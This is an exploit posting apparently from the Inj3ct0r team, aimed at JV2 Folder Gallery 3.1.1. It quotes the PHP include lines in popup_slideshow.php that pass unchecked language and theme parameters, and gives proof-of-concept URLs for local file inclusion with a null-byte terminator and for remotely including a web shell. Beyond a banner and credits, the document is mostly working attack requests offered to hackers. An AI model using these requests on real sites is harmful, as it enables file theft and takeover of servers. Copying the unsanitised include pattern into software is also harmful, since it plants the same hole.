-----------------------------------------------------------------------------------

JV2 Folder Gallery 3.1.1 (popup_slideshow.php) Multiple Vulnerability

-----------------------------------------------------------------------------------



1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0

0     _                   __           __       __                     1

1   /' \            __  /'__`\        /\ \__  /'__`\                   0

0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1

1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0

0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1

1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0

0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1

1                  \ \____/ >> Exploit database separated by exploit   0

0                   \/___/          type (local, remote, DoS, etc.)    1

1                                                                      1

0  [+] Site            : Inj3ct0r.com                                  0

1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1

0                                                                      0

1                    ########################################          1

0                    I'm eidelweiss member from Inj3ct0r Team          1

1                    ########################################          0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1



Vendor:         www.foldergallery.jv2.net

download:       http://foldergallery.jv2.net/Download/

Author:         eidelweiss

Thank`s:                All Friends & All Hacker`s



-----------------------------------------------------------------------------------



        -=[ Vuln Code ]=-



[-] /path/gallery/gallery/popup_slideshow.php



<?php 

include ("config/gallerysetup.php");

include ("config/galleryconfig.php");

include ("config/file_handling.php");

include ("config/lang/".$language.".php");      // <= 1

include ("theme/".$gallerytheme."/config.php"); // <= 2



-----------------------------------------------------------------------------------



        -=[ P0C ]=-



        http://127.0.0.1/path/gallery/popup_slideshow.php?language= [LFI]%00



        http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= [LFI]%00



        http://127.0.0.1/path/gallery/popup_slideshow.php?gallerytheme= 
[inj3ct0r shell]



=========================| -=[ E0F ]=- |=========================

Reply via email to